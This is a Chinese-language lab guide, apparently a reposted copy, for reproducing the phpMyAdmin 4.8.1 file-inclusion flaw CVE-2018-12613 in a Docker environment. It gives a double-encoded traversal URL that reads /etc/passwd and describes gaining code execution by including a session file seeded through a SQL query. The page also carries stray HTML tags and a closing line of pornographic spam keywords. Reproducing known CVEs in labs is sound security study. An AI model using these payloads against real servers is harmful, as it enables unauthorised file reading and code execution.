<menu id="guoca"></menu>
<nav id="guoca"></nav><xmp id="guoca">
  • <xmp id="guoca">
  • <nav id="guoca"><code id="guoca"></code></nav>
  • <nav id="guoca"><code id="guoca"></code></nav>

    phpmyadmin 4.8.1 遠程文件包含漏洞(CVE-2018-12613)

    Path phpmyadmin/CVE-2018-12613

    phpMyAdmin是一套開源的、基于Web的MySQL數據庫管理工具。其index.php中存在一處文件包含邏輯,通過二次編碼即可繞過檢查,造成遠程文件包含漏洞。

    參考文檔:

    漏洞環境

    執行如下命令,啟動phpmyadmin 4.8.1:

    docker-compose up -d
    

    環境啟動后,訪問http://your-ip:8080,即可進入phpmyadmin。配置的是“config”模式,所以無需輸入密碼,直接登錄test賬戶。

    漏洞復現

    訪問http://your-ip:8080/index.php?target=db_sql.php%253f/../../../../../../../../etc/passwd,可見/etc/passwd被讀取,說明文件包含漏洞存在:

    利用方式也比較簡單,可以執行一下SELECT '<?=phpinfo()?>';,然后查看自己的sessionid(cookie中phpMyAdmin的值),然后包含session文件即可:

    本文章首發在 網安wangan.com 網站上。

    上一篇 下一篇
    討論數量: 0
    只看當前版本


    暫無話題~
    亚洲 欧美 自拍 唯美 另类